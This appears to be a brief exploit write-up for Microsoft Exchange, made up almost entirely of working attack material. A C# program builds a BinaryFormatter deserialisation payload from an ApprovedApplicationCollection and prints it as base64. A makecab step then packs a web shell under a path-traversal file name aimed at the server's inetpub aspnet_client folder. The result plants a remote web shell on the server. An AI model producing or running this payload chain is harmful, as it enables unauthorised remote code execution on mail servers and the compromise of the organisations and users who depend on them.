Generate ApprovedApplication BinaryFormatter payload

Generator.cs

using System;
using System.Globalization;
using System.IO;
using System.Reflection;
using System.Runtime.Serialization.Formatters.Binary;
using System.Threading;
using Microsoft.Exchange.Data.Directory.SystemConfiguration;

namespace ApprovedAppGenerator
{
    internal class Program
    {
        static void Main(string[] args)
        {
            string cabFile = "test.cab";
            var app = (ApprovedApplication)Activator.CreateInstance(typeof(ApprovedApplication),
               BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance, 
               null, new object[] { cabFile }, CultureInfo.InvariantCulture);

            ApprovedApplicationCollection collection = new ApprovedApplicationCollection();
            collection.Add(app);

            byte[] arr;

            using (MemoryStream memStream = new MemoryStream())
            {
                BinaryFormatter formatter = new BinaryFormatter();
                formatter.Serialize(memStream, collection);
                arr = memStream.ToArray();
                memStream.Seek(0, SeekOrigin.Begin);
                object obj = formatter.Deserialize(memStream);
                Console.WriteLine(obj.GetType());
                Thread.Sleep(3000);
            }

            string str = Convert.ToBase64String(arr);
            Console.WriteLine(str);
        }
    }
}

Make the cab:

PS C:\temp\cab> type .\files.txt
C:\temp\webshell.aspx "../../../../../../../inetpub/wwwroot/aspnet_client/system_web/shell.aspx"
PS C:\temp\cab> makecab /f .\files.txt
Cabinet Maker - Lossless Data Compression Tool

106 bytes in 1 files
Total files:              1
Bytes before:           106
Bytes after:            102
After/Before:            96.23% compression
Time:                     0.02 seconds ( 0 hr  0 min  0.02 sec)
Throughput:               4.31 Kb/second
PS C:\temp\cab>